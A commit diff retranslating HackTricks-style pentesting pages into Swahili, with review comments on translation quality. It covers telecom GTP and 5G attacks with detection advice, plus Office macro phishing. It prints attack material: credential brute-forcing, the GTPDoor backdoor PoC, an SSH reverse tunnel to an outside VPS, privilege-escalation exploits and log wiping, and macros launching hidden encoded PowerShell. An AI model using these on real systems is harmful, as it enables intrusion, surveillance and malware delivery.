Translated ['src/generic-methodologies-and-resources/pentesting-network/

This commit is contained in:
Translator 2025-09-07 22:17:53 +00:00
parent b451ad98dd
commit 6dda951bef
3 changed files with 167 additions and 157 deletions

View File

@ -1,27 +1,27 @@
# Utekaji wa Mtandao wa Telecom (GTP / Roaming Environments)
# Telecom Network Exploitation (GTP / Roaming Environments)
{{#include ../../banners/hacktricks-training.md}}
> [!NOTE]
> Mobile-core protocols (GPRS Tunnelling Protocol GTP) mara nyingi husafiri kwenye semi-trusted GRX/IPX roaming backbones. Kwa sababu zinatumia UDP wazi bila uthibitisho mwingi, **nafasi ya kuingia ndani ya mipaka ya telecom mara nyingi inaweza kufikia ngazi za uashiriaji za msingi moja kwa moja**. Vidokezo vinavyoifuata vinakusanya mbinu za mashambulizi zilizoshuhudiwa kwenye mazingira halisi dhidi ya SGSN/GGSN, PGW/SGW na nodi nyingine za EPC.
> Itifaki za core za simu (GPRS Tunnelling Protocol GTP) mara nyingi hupitia semi-trusted GRX/IPX roaming backbones. Kwa kuwa zinaendeshwa juu ya plain UDP na karibu bila uthibitishaji, **ufikiaji wowote ndani ya mipaka ya telecom mara nyingi unaweza kufikia moja kwa moja signalling planes za core**. Maelezo yafuatayo yanakusanya mbinu za kushambulia zilizoonekana katika mazingira ya vitani dhidi ya SGSN/GGSN, PGW/SGW na nodes nyingine za EPC.
## 1. Uchunguzi & Upataji wa Awali
## 1. Recon & Initial Access
### 1.1 Akaunti za OSS / NE za Chaguo-msingi
Seti kubwa, kwa mshangao, ya vendor network elements huja na watumiaji wa SSH/Telnet walio hard-coded kama `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … Orodha maalum ya maneno (wordlist) inaongeza kwa kiasi kikubwa mafanikio ya brute-force:
### 1.1 Default OSS / NE Accounts
Seti kubwa kwa kushangaza ya elementi za mtandao kutoka kwa wauzaji huja na watumiaji waliowekwa imara wa SSH/Telnet kama `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … wordlist maalum huongeza kwa kiasi kikubwa mafanikio ya brute-force:
```bash
hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt
```
Ikiwa kifaa kinatoa management VRF pekee, pivot kupitia jump host kwanza (angalia sehemu «SGSN Emu Tunnel» hapa chini).
Ikiwa kifaa kinaonyesha tu management VRF, pivot kupitia jump host kwanza (tazama sehemu «SGSN Emu Tunnel» hapa chini).
### 1.2 Ugundaji wa Host ndani ya GRX/IPX
Wengi wa waendeshaji wa GRX bado huruhusu **ICMP echo** kupitia backbone. Changanya `masscan` na probe za UDP zilizojengwa `gtpv1` ili ramani kwa haraka wasikilizi wa GTP-C:
Wengi wa operatori wa GRX bado wanaruhusu **ICMP echo** kupita kwenye backbone. Changanya `masscan` na probes za UDP zilizojengwa `gtpv1` ili kwa haraka ramani ya GTP-C listeners:
```bash
masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55
```
## 2. Kuorodhesha Abonenti `cordscan`
## 2. Kuorodhesha Abonati `cordscan`
Zana ifuatayo ya Go inatengeneza vifurushi vya **GTP-C Create PDP Context Request** na inarekodi majibu. Kila jibu linafunua **SGSN / MME** ya sasa inayohudumia IMSI iliyoulizwa na, wakati mwingine, PLMN aliyotembelewa na abonenti.
Chombo cha Go kilicho hapa kinatengeneza vifurushi vya **GTP-C Create PDP Context Request** na kurekodi majibu. Kila jibu linafunua **SGSN / MME** ya sasa inayohudumia IMSI iliyoulizwa na, wakati mwingine, PLMN iliyotembelewa na abonati.
```bash
# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
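Review bot: the three headings in this hunk move in the wrong direction for a translation commit: `# Telecom Network Exploitation (GTP / Roaming Environments)`, `## 1. Recon & Initial Access` and `### 1.1 Default OSS / NE Accounts` replace Swahili headings with English ones, so the new text puts Swahili paragraphs under English headings. Keep the removed renderings (e.g. `# Utekaji wa Mtandao wa Telecom (GTP / Roaming Environments)`) so the section is in one language. Separately, the rewritten masscan sentence `ili kwa haraka ramani ya GTP-C listeners` has lost its verb ("ramani" is the noun "map"); something like `ili kuchora ramani ya GTP-C listeners kwa haraka` makes it a complete clause.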
@ -29,20 +29,20 @@ GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
# Usage (typical):
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap
```
Bendera kuu:
Bendera muhimu:
- `--imsi` IMSI ya mteja lengwa
- `--oper` Home / HNI (MCC+MNC)
- `-w` Andika vifurushi ghafi kwenye pcap
- `-w` Andika paketi ghafi kwenye pcap
Vigezo muhimu ndani ya binary vinaweza kurekebishwa ili kupanua skani:
Konstanti muhimu ndani ya binary zinaweza kubadilishwa ili kupanua skani:
```
pingtimeout = 3 // seconds before giving up
pco = 0x218080
common_tcp_ports = "22,23,80,443,8080"
```
## 3. Code Execution over GTP `GTPDoor`
## 3. Utekelezaji wa Msimbo kupitia GTP `GTPDoor`
`GTPDoor` ni huduma ndogo ya ELF ambayo **inasikiliza UDP 2123 na inachambua kila packet ya GTP-C inayokuja**. Wakati payload inaanza na pre-shared tag, sehemu iliyobaki ina-decrypted (AES-128-CBC) na inatekelezwa kupitia `/bin/sh -c`. stdout/stderr zinexfiltrated ndani ya **Echo Response** messages ili hakuna outward session ipatikane.
`GTPDoor` ni huduma ndogo ya ELF ambayo **binds UDP 2123 and parses every incoming GTP-C packet**. Wakati payload inaanza na pre-shared tag, sehemu iliyobaki ina-decrypted (AES-128-CBC) na inatekelezwa kupitia `/bin/sh -c`. stdout/stderr hu-exfiltrate ndani ya ujumbe za **Echo Response** ili hakuna outward session kamwe isiundwe.
Minimal PoC packet (Python):
```python
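Review bot: `-w` Andika paketi ghafi kwenye pcap switches the word for "packets" to "paketi", while the cordscan paragraph just above this hunk keeps "vifurushi" (both the removed and the added line use it); choose one rendering for the whole file. The other changes here (`Bendera muhimu:`, `Konstanti muhimu ndani ya binary ...`) read fine.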
@ -52,24 +52,24 @@ cmd = b"id;uname -a"
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))
```
Utambuzi:
* host yoyote inayetuma **unbalanced Echo Requests** kwa anwani za IP za SGSN
* bendera ya GTP version imewekwa kwa 1 wakati message type = 1 (Echo) deviation from spec
Ugunduzi:
* yoyote mwenyeji anayetuma **unbalanced Echo Requests** kwa anwani za IP za SGSN
* bendera ya toleo la GTP imewekwa kwa 1 wakati aina ya ujumbe = 1 (Echo) utofauti na spec
## 4. Pivoting Through the Core
### 4.1 `sgsnemu` + SOCKS5
`OsmoGGSN` hutoa SGSN emulator inayoweza **kuanzisha PDP context kuelekea GGSN/PGW halisi**. Mara baada ya makubaliano, Linux hupokea interface mpya `tun0` inayoweza kufikiwa kutoka kwa roaming peer.
`OsmoGGSN` inakuja na emulator ya SGSN inayoweza **kuanzisha muktadha wa PDP kuelekea GGSN/PGW halisi**. Baada ya kukubaliana, Linux hupokea interface mpya `tun0` inayoweza kufikiwa kutoka kwa roaming peer.
```bash
sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
-APN internet -c 1 -d
ip route add 172.16.0.0/12 dev tun0
microsocks -p 1080 & # internal SOCKS proxy
```
Kwa hair-pinning sahihi ya firewall, tunnel hii inapita kando ya signalling-only VLANs na inakuweka moja kwa moja kwenye **data plane**.
Kwa hair-pinning sahihi ya firewall, tundu hili linapita kando ya signalling-only VLANs na linakupeleka moja kwa moja kwenye **safu ya data**.
### 4.2 SSH Reverse Tunnel over Port 53
DNS karibu kila mara iko wazi katika miundombinu ya roaming. Fungua huduma ya ndani ya SSH kwa VPS yako ikisikiliza kwenye :53, kisha rudi nyumbani baadaye:
DNS huwa wazi karibu kila mara katika miundombinu za roaming. Fungua huduma ya ndani ya SSH kwenye VPS yako ikisikiliza kwenye :53 na urudi baadaye kutoka nyumbani:
```bash
ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com
```
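Review bot: the rewritten GTPDoor paragraph leaves an untranslated English fragment in the middle of a Swahili sentence, `ambayo **binds UDP 2123 and parses every incoming GTP-C packet**`, although the removed line already had it in Swahili (`inasikiliza UDP 2123 na inachambua kila packet ya GTP-C inayokuja`); this is a regression and the old wording should be kept. Note also that the heading here goes English to Swahili (`## 3. Code Execution over GTP` becomes `## 3. Utekelezaji wa Msimbo kupitia GTP`), the opposite of what the first hunk does to section 1's headings. In 4.1, `tundu hili` (a hole) is a doubtful rendering of "this tunnel"; `handaki hili` or leaving `tunnel hii` as in the removed line is clearer.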
@ -77,13 +77,13 @@ Hakikisha kwamba `GatewayPorts yes` imewezeshwa kwenye VPS.
## 5. Covert Channels
| Chaneli | Usafirishaji | Kuutafsiri | Maelezo |
|---------|--------------|------------|---------|
| ICMP `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | msikilizaji pasivu kabisa, hakuna trafiki ya kutoka |
| DNS `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) imekodishwa katika octets za rekodi A | inatazama sub-domain `*.nodep` |
| GTP `GTPDoor` | UDP 2123 | AES-128-CBC blob katika private IE | inajumuika na mazungumzo halali ya GTP-C |
| Channel | Transport | Decoding | Notes |
|---------|-----------|----------|-------|
| ICMP `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | msikilizaji wa kimyakimya kabisa, hakuna trafiki ya kutoka |
| DNS `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) encoded in A-record octets | inatazama `*.nodep` sub-domain |
| GTP `GTPDoor` | UDP 2123 | AES-128-CBC blob in private IE | inaingiliana na mazungumzo halali ya GTP-C chatter |
Implants zote zina watchdogs zinazofanya **timestomp** binaries zao na ku-re-spawn ikiwa zimecrash.
All implants implement watchdogs that **timestomp** their binaries and re-spawn if crashed.
## 6. Defense Evasion Cheatsheet
```bash
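Review bot: the new covert-channel table de-translates content that was already in Swahili: the header row becomes `| Channel | Transport | Decoding | Notes |` (was `| Chaneli | Usafirishaji | Kuutafsiri | Maelezo |`), the cells `encoded in A-record octets` and `AES-128-CBC blob in private IE` are now English, and the watchdog sentence is replaced wholesale by its English source `All implants implement watchdogs that **timestomp** their binaries and re-spawn if crashed.` Restore the Swahili versions; the only change worth keeping is `msikilizaji wa kimyakimya kabisa`. The GTPDoor row also doubles a term, `mazungumzo halali ya GTP-C chatter` ("mazungumzo" already translates "chatter"), so drop the trailing English word.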
@ -111,79 +111,79 @@ python3 PwnKit.py
# Sudo Baron Samedit CVE-2021-3156
python3 exploit_userspec.py
```
Kidokezo cha usafishaji:
Dokezo la kusafisha:
```bash
userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c
```
## 8. Zana
* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` zana maalum zilizotajwa katika sehemu zilizopita.
* `FScan` : intranet TCP sweeps (`fscan -p 22,80,443 10.0.0.0/24`)
* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` custom tooling described in previous sections.
* `FScan` : msako wa TCP kwenye intranet (`fscan -p 22,80,443 10.0.0.0/24`)
* `Responder` : LLMNR/NBT-NS rogue WPAD
* `Microsocks` + `ProxyChains` : pivoting nyepesi ya SOCKS5
* `FRP` (≥0.37) : uvuka NAT / kuunganisha mali
* `FRP` (≥0.37) : traversal ya NAT / kuunganisha asset
## 9. 5G NAS Registration Attacks: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay
## 9. Mashambulizi ya Usajili wa 5G NAS: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay
Taratibu ya usajili ya 5G inaendeshwa juu ya NAS (Non-Access Stratum) juu ya NGAP. Hadi usalama wa NAS uanzishwe na Security Mode Command/Complete, ujumbe wa awali hauhakikiwa na haujasimbwa. Dirisha hili kabla ya usalama linaweza kuwezesha njia mbalimbali za kushambulia wakati unaweza kuangalia au kubadilisha trafiki ya N2 (mf., on-path ndani ya core, rogue gNB, au testbed).
Mchakato wa usajili wa 5G unaendeshwa juu ya NAS (Non-Access Stratum) juu ya NGAP. Hadi usalama wa NAS uanzishwe kwa Security Mode Command/Complete, ujumbe za awali hazijathibitishwa wala hazijafichwa. Dirisha hili kabla ya usalama huruhusu njia mbalimbali za mashambulizi wakati unaweza kuangalia au kuharibu trafiki ya N2 (mf., on-path ndani ya core, rogue gNB, au testbed).
Mtiririko wa usajili (ulifupishwa):
- Registration Request: UE inatuma SUCI (SUPI iliyosimbwa) na sifa/uwezo.
- Authentication: AMF/AUSF hutuma RAND/AUTN; UE hurudisha RES*.
- Security Mode Command/Complete: uadilifu na usimbaji wa NAS vinajadiliwa na kuanzishwa.
Mtiririko wa usajili (imefupishwa):
- Registration Request: UE inatuma SUCI (SUPI iliyofichwa) na capabilities.
- Authentication: AMF/AUSF inatuma RAND/AUTN; UE inarejesha RES*.
- Security Mode Command/Complete: NAS integrity na ciphering vinajadiliwa na kuanzishwa.
- PDU Session Establishment: usanidi wa IP/QoS.
Vidokezo vya kuanzisha maabara (si-RF):
- Core: usanidi wa default wa Open5GS unatosha kuiga mtiririko.
- UE: simulator au UE ya majaribio; tumia Wireshark kuchambua.
Vidokezo vya usanidi wa maabara (si-RF):
- Core: Open5GS default deployment inatosha kuzalisha mtiririko.
- UE: simulator au UE ya majaribio; decode kwa kutumia Wireshark.
- Active tooling: 5GReplay (capture/modify/replay NAS within NGAP), Sni5Gect (sniff/patch/inject NAS on the fly without bringing up a full rogue gNB).
- Useful display filters in Wireshark:
- Filters muhimu za kuonyesha katika Wireshark:
- ngap.procedure_code == 15 (InitialUEMessage)
- nas_5g.message_type == 65 or nas-5gs.message_type == 65 (Registration Request)
### 9.1 Faragha ya kitambulisho: kushindwa kwa SUCI kunachofichua SUPI/IMSI
Kinachotarajiwa: UE/USIM lazima itume SUCI (SUPI iliyosimbwa kwa funguo ya umma ya home-network). Kupata SUPI/IMSI ya plaintext katika Registration Request kunaonyesha kasoro ya faragha inayoweza kuwezesha ufuatiliaji wa mteja kwa kudumu.
### 9.1 Faragha ya kitambulisho: SUCI failures exposing SUPI/IMSI
Inatarajiwa: UE/USIM lazima itume SUCI (SUPI iliyofichwa kwa funguo za umma za mtandao wa nyumbani). Kupata SUPI/IMSI wazi ndani ya Registration Request inaonyesha dosari ya faragha inayowezesha kufuatilia mteja kwa muda mrefu.
Jinsi ya kujaribu:
- Kamua ujumbe wa kwanza wa NAS katika InitialUEMessage na kagua Mobile Identity IE.
- Uhakiki wa haraka wa Wireshark:
- Inapaswa kutafsiriwa kama SUCI, si IMSI.
- Mfano wa vichujio: `nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci` inapaswa kuwepo; kutokuwepo pamoja na kuwepo kwa `imsi` indicates leakage.
- Kamata ujumbe wa kwanza wa NAS katika InitialUEMessage na chunguza Mobile Identity IE.
- Ukaguzi wa haraka kwenye Wireshark:
- Inapaswa ku-decode kama SUCI, sio IMSI.
- Filter examples: `nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci` inapaswa kuwepo; kutokuwepo pamoja na uwepo wa `imsi` kunaonyesha kuvuja.
Nini cha kukusanya:
- MCC/MNC/MSIN ikiwa imefunuliwa; rekodi kwa kila UE na fuatilia kwa muda/mahali.
Nini kukusanya:
- MCC/MNC/MSIN ikiwa imetolewa; rejea kwa kila-UE na fuatilia kwa muda/mahali.
Kuzuia:
- Lazimisha UEs/USIMs zinazotuma SUCI pekee; toa tahadhari kwa IMSI/SUPI yoyote katika NAS ya awali.
Kupunguza:
- Lazimisha UEs/USIMs zenye SUCI pekee; toa tahadhari juu ya IMSI/SUPI yoyote katika NAS ya mwanzo.
### 9.2 Kupungua kwa uwezo hadi algorithimu za null (EEA0/EIA0)
Asili:
- UE inatangaza EEA (encryption) na EIA (integrity) zinazotegemewa katika UE Security Capability IE ya Registration Request.
- Mepangilio ya kawaida: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 ni algorithimu za null.
### 9.2 Kupunguza uwezo (capability bidding-down) hadi algoritmu tupu (EEA0/EIA0)
Mandhari:
- UE inatangaza EEA (encryption) na EIA (integrity) zinazotunukiwa katika UE Security Capability IE ya Registration Request.
- Ramani za kawaida: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 ni algoritmu tupu (null).
Tatizo:
- Kwa sababu Registration Request haijalindwa kwa uadilifu, mshambuliaji aliye on-path anaweza kuzima bits za capability ili kulazimisha uteuzi wa EEA0/EIA0 baadaye wakati wa Security Mode Command. Baadhi ya stacks vibaya huwaruhusu algorithimu za null hata nje ya huduma za dharura.
- Kwa sababu Registration Request haijalindwa kwa integriti, mshambuliaji aliye on-path anaweza kufuta bits za capability ili kulazimisha uchaguzi wa EEA0/EIA0 baadaye wakati wa Security Mode Command. Baadhi ya stacks kwa makosa huruhusu algoritmu tupu nje ya huduma za dharura.
Hatua za kushambulia:
- Shika InitialUEMessage na badilisha NAS UE Security Capability ili itangaze EEA0/EIA0 tu.
- Kwa Sni5Gect, hook ujumbe wa NAS na patch bits za capability kabla ya kupeleka mbele.
- Angalia kama AMF inakubali ciphers/udhibiti za null na inakamilisha Security Mode kwa EEA0/EIA0.
- Intercept InitialUEMessage na badilisha NAS UE Security Capability ili kutangaza tu EEA0/EIA0.
- Kwa Sni5Gect, hook ujumbe wa NAS na patch bits za capability kabla ya kuendelea.
- Angalia kama AMF inakubali null ciphers/integrity na inakamilisha Security Mode kwa EEA0/EIA0.
Uthibitisho/uwazi:
- Katika Wireshark, thibitisha algorithimu zilizochaguliwa baada ya Security Mode Command/Complete.
- Mfano wa matokeo ya passive sniffer:
Uhakiki/uwazi:
- Katika Wireshark, thibitisha algoritmu zilizochaguliwa baada ya Security Mode Command/Complete.
- Mfano wa output ya passive sniffer:
```
Encyrption in use [EEA0]
Integrity in use [EIA0, EIA1, EIA2]
SUPI (MCC+MNC+MSIN) 9997000000001
```
Mikakati ya kupunguza (lazima):
- Sanidi AMF/policy ili kukataa EEA0/EIA0 isipokuwa pale inapohitajika kwa umakini (mf., simu za dharura).
- Pendelea kutekeleza EEA2/EIA2 angalau; rekodi na toa onyo/alaramu kwa muktadha wowote wa usalama wa NAS unaojadiliana na null algorithms.
Mikakati (zinazohitajika):
- Sanidi AMF/policy kukataa EEA0/EIA0 isipokuwa pale inapotakiwa kwa lazima (kwa mfano, simu za dharura).
- Pendelea kutekeleza EEA2/EIA2 kama kiwango cha chini; rekodi na toa alarm kwa muktadha wowote wa usalama wa NAS unaojadiliana kuhusu null algorithms.
### 9.3 Replay ya initial Registration Request (pre-security NAS)
Kwa sababu initial NAS haina integrity na freshness, InitialUEMessage+Registration Request iliyorekodiwa inaweza kureplayed kwa AMF.
Kwa sababu initial NAS haina uadilifu na freshness, InitialUEMessage+Registration Request iliyokamatwa inaweza kureplayed kwa AMF.
PoC rule for 5GReplay to forward matching replays:
```xml
@ -208,34 +208,34 @@ boolean_expression="nas_5g.message_type == 65"/>
</property>
</beginning>
```
Kile cha kuangalia:
- Je, AMF inakubali replay na kuendelea na Authentication; ukosefu wa freshness/context validation unaonyesha udhaifu.
Kitu cha kuangalia:
- Je, AMF inakubali replay na kuendelea na Authentication; ukosefu wa uhakiki wa uhalisia au wa muktadha unaonyesha hatari.
Mitigations:
- Enforce replay protection/context binding kwenye AMF; rate-limit na correlate per-GNB/UE.
Marekebisho:
- Lazimisha replay protection/context binding kwenye AMF; rate-limit na correlate kwa kila GNB/UE.
### 9.4 Tooling pointers (reproducible)
### 9.4 Vidokezo vya zana (inayoweza kurudiwa)
- Open5GS: anzisha AMF/SMF/UPF kuiga core; tazama N2 (NGAP) na NAS.
- Wireshark: hakiki decodes za NGAP/NAS; tumia filters zilizo juu kutenganisha Registration.
- 5GReplay: capture registration, kisha replay NGAP + NAS messages maalum kama ilivyo kwenye rule.
- Sni5Gect: live sniff/modify/inject NAS control-plane ili kulazimisha null algorithms au kuingilia authentication sequences.
- Wireshark: thibitisha ufasiri wa NGAP/NAS; tumia filters zilizo juu ili kutenganisha Registration.
- 5GReplay: rekodi registration, kisha replay ujumbe maalum za NGAP + NAS kama sheria inavyoeleza.
- Sni5Gect: sniff/modify/inject NAS control-plane kwa moja kwa moja ili kulazimisha null algorithms au kuingilia authentication sequences.
### 9.5 Defensive checklist
- Fuatilia kila wakati Registration Request kwa SUPI/IMSI zilizo wazi (plaintext); zuia vifaa/USIMs vinavyokiuka.
- Kataa EEA0/EIA0 isipokuwa taratibu za dharura zilizoelezwa kwa ukungu; hitaji angalau EEA2/EIA2.
- Gundua infrastructure haramu au iliyopangwa vibaya: unauthorized gNB/AMF, unexpected N2 peers.
- Toa onyo kuhusu NAS security modes zinazosababisha null algorithms au replay mara kwa mara za InitialUEMessage.
### 9.5 Orodha ya ulinzi
- Endelea kuchunguza Registration Request kwa plaintext SUPI/IMSI; zuia vifaa/USIMs vinavyokiuka.
- Kataa EEA0/EIA0 isipokuwa kwa taratibu za dharura zilizobainishwa kwa ukomo; hitaji angalau EEA2/EIA2.
- Gundua miundombinu haribifu au iliyopangwa vibaya: unauthorized gNB/AMF, unexpected N2 peers.
- Toa onyo kuhusu NAS security modes zinazosababisha null algorithms au replay mara kwa mara ya InitialUEMessage.
---
## Detection Ideas
## Mawazo ya Ugunduzi
1. **Kifaa chochote isipokuwa SGSN/GGSN kinachounda Create PDP Context Requests**.
2. **Ports zisizo za kawaida (53, 80, 443) kupokea SSH handshakes** kutoka internal IPs.
3. **Echo Requests mara kwa mara bila Echo Responses zinazolingana** inaweza kuashiria GTPDoor beacons.
4. **Kiwango kikubwa cha trafiki ya ICMP echo-reply yenye identifier/sequence fields kubwa, zisizo sifuri**.
5. 5G: **InitialUEMessage yenye NAS Registration Requests zinazorudiwa kutoka identical endpoints** (replay signal).
6. 5G: **NAS Security Mode negotiating EEA0/EIA0** nje ya emergency contexts.
2. **Porti zisizo za kawaida (53, 80, 443) zinapokea SSH handshakes** kutoka IP za ndani.
3. **Echo Requests mara kwa mara bila Echo Responses zinazolingana** inaweza kuonyesha GTPDoor beacons.
4. **Kiwango kikubwa cha trafiki ya ICMP echo-reply iliyo na uwanja mkubwa wa identifier/sequence usio sifuri**.
5. 5G: **InitialUEMessage inayobeba NAS Registration Requests zinazorudiwa kutoka vituo sawa** (ishara ya replay).
6. 5G: **NAS Security Mode inayojadili EEA0/EIA0** nje ya muktadha wa dharura.
## References
## Marejeo
- [Palo Alto Unit42 Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/)
- 3GPP TS 29.060 GPRS Tunnelling Protocol (v16.4.0)
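Review bot: the section 9 heading is only half translated, `## 9. Mashambulizi ya Usajili wa 5G NAS: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay`, and in 9.1 `Filter examples:` replaces the Swahili `Mfano wa vichujio:` of the removed line; both should be fully in Swahili. The label for "Mitigations" is rendered three different ways within this one hunk: `Kupunguza:` (9.1), `Mikakati (zinazohitajika):` (9.2) and `Marekebisho:` (9.3), the last of which means "corrections" rather than mitigations; pick one term and use it in all three subsections. The context lines `- Active tooling: 5GReplay ...` and `PoC rule for 5GReplay to forward matching replays:` remain English in both versions and could be picked up in the same pass. The sample sniffer output (`Encyrption in use [EEA0]`) is quoted tool output and is correctly left untouched.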

View File

@ -1,40 +1,40 @@
# Phishing Faili & Nyaraka
# Faili na Nyaraka za Phishing
{{#include ../../banners/hacktricks-training.md}}
## Nyaraka za Office
Microsoft Word hufanya uthibitishaji wa data za faili kabla ya kufungua faili. Uthibitishaji wa data hufanywa kwa njia ya utambuzi wa muundo wa data, dhidi ya kiwango cha OfficeOpenXML. Kama hitilafu yoyote itatokea wakati wa utambuzi wa muundo wa data, faili inayochunguzwa haitafunguliwa.
Microsoft Word hufanya uhakiki wa data za faili kabla ya kufungua faili. Uhakiiki wa data unafanywa kwa njia ya utambuzi wa muundo wa data, kulingana na viwango vya OfficeOpenXML. Ikiwa hitilafu yoyote itatokea wakati wa utambuzi wa muundo wa data, faili inayochunguzwa haitafunguliwa.
Kawaida, Word files containing macros use the `.docm` extension. Hata hivyo, inawezekana kubadilisha jina la faili kwa kubadilisha nyongeza ya faili na bado kuhifadhi uwezo wao wa kutekeleza macro.\
Kwa mfano, faili ya RTF kwa kawaida haisaidii macros, kwa muundo, lakini faili ya DOCM iliyobadilishwa jina kuwa RTF itashughulikiwa na Microsoft Word na itakuwa na uwezo wa kutekeleza macro.\
Miundo na mekanisimu za ndani zile zile zinatumika kwa programu zote za Microsoft Office Suite (Excel, PowerPoint etc.).
Kwa kawaida, faili za Word zenye macros zinatumia extension ya `.docm`. Hata hivyo, inawezekana kubadilisha jina la faili kwa kubadilisha extension ya faili na bado kuhifadhi uwezo wao wa kutekeleza macros.\
Kwa mfano, faili ya RTF haiungi mkono macros, kwa muundo, lakini faili ya DOCM iliyobadilishwa jina kuwa RTF itashughulikiwa na Microsoft Word na itakuwa na uwezo wa kutekeleza macros.\
Mekanismi na vipengele vya ndani sawa vinatumika kwa programu zote za Microsoft Office Suite (Excel, PowerPoint etc.).
Unaweza kutumia amri ifuatayo kuchunguza ni nyongeza zipi zitakazotekelezwa na programu fulani za Office:
Unaweza kutumia amri ifuatayo kuangalia ni extension zipi ambazo zitatekelezwa na baadhi ya programu za Office:
```bash
assoc | findstr /i "word excel powerp"
```
Faili za DOCX zinazorejelea kiolezo cha mbali (File Options Add-ins Manage: Templates Go) kinachojumuisha macros zinaweza pia “kutekeleza” macros.
Faili za DOCX zinazorejelea kiolezo cha mbali (File Options Add-ins Manage: Templates Go) ambazo zina macros zinaweza pia “execute” macros.
### Kupakia Picha ya Nje
### Kupakia Picha za Nje
Nenda kwa: _Insert --> Quick Parts --> Field_\
_**Jamii**: Links and References, **Majina ya field**: includePicture, na **Jina la Faili au URL**:_ http://<ip>/whatever
_**Categories**: Links and References, **Filed names**: includePicture, and **Filename or URL**:_ http://<ip>/whatever
![](<../../images/image (155).png>)
### Macros Backdoor
Inawezekana kutumia macros kuendesha msimbo wa aina yoyote kutoka kwa hati.
Inawezekana kutumia macros kuendesha arbitrary code kutoka kwenye dokumenti.
#### Autoload functions
Kadiri zinavyozidi kuwa za kawaida, ndivyo AV inavyoweza kuzitambua.
Kadiri zinavyokuwa za kawaida zaidi, ndivyo uwezekano wa AV kuzitambua.
- AutoOpen()
- Document_Open()
#### Mifano ya msimbo ya Macros
#### Mifano ya Macros Code
```vba
Sub AutoOpen()
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc 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")
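Review bot: the added Office paragraph introduces a typo, `Uhakiiki wa data unafanywa`, where the same line begins with the correct `uhakiki`. Further down, `zinaweza pia “execute” macros` keeps the English verb where the removed line had `“kutekeleza”`, and the includePicture instructions are replaced by the English source `_**Categories**: Links and References, **Filed names**: includePicture, ...`, which also carries the typo "Filed names" for "Field names"; the removed Swahili line (`**Jamii**: Links and References, **Majina ya field**: includePicture, ...`) should be kept. `kuendesha arbitrary code` and the heading `#### Mifano ya Macros Code` mix languages as well; the removed `msimbo wa aina yoyote` and `Mifano ya msimbo ya Macros` are better.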
@ -64,16 +64,16 @@ Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated>
```
#### Ondoa metadata kwa mikono
#### Ondoa metadata kwa mkono
Nenda kwa **File > Info > Inspect Document > Inspect Document**, ambayo itaonyesha Document Inspector. Bonyeza **Inspect** kisha **Remove All** kando ya **Document Properties and Personal Information**.
Nenda kwenye **File > Info > Inspect Document > Inspect Document**, ambayo itafungua Document Inspector. Bonyeza **Inspect** kisha **Remove All** kando ya **Document Properties and Personal Information**.
#### Upanuzi wa Doc
#### Ugani la Doc
Wakati umemaliza, chagua dropdown ya **Save as type**, badilisha fomati kutoka **`.docx`** kuwa **Word 97-2003 `.doc`**.\
Fanya hivi kwa sababu huwezi kuhifadhi macros ndani ya **`.docx`** na kuna stigma kuhusiana na extension ya macro-enabled **`.docm`** (mf., ikoni ya thumbnail ina `!` kubwa na baadhi ya web/email gateway huziweka block kabisa). Kwa hivyo, extension ya legacy **`.doc`** ni suluhisho bora.
When finished, select **Save as type** dropdown, change the format from **`.docx`** to **Word 97-2003 `.doc`**.\
Fanya hivi kwa sababu wewe **can't save macro's inside a `.docx`** na kuna aibu inayohusiana na ugani unaounga mkono macro **`.docm`** (mfano ikoni ya thumbnail ina `!` kubwa na baadhi ya web/email gateway huzuia kabisa). Kwa hiyo, ugani wa zamani **`.doc`** ndio suluhisho bora.
#### Vizalishaji vya Macros Hatari
#### Malicious Macros Generators
- MacOS
- [**macphish**](https://github.com/cldrn/macphish)
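Review bot: `#### Ugani la Doc` has a noun-class agreement error; "ugani" takes "wa", as the same hunk writes later in `ugani wa zamani`, so `#### Ugani wa Doc`. The paragraph under it is a regression: `When finished, select **Save as type** dropdown, change the format from **`.docx`** to **Word 97-2003 `.doc`**.` is the English source replacing the already-translated `Wakati umemaliza, chagua dropdown ya **Save as type** ...`, and the next sentence mixes languages (`wewe **can't save macro's inside a `.docx`**`, with a stray apostrophe in "macro's") where the removed line had `huwezi kuhifadhi macros ndani ya **`.docx`**`. The heading `#### Malicious Macros Generators` likewise replaces the Swahili `#### Vizalishaji vya Macros Hatari`; restore the removed lines.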
@ -81,9 +81,9 @@ Fanya hivi kwa sababu huwezi kuhifadhi macros ndani ya **`.docx`** na kuna stigm
## Faili za HTA
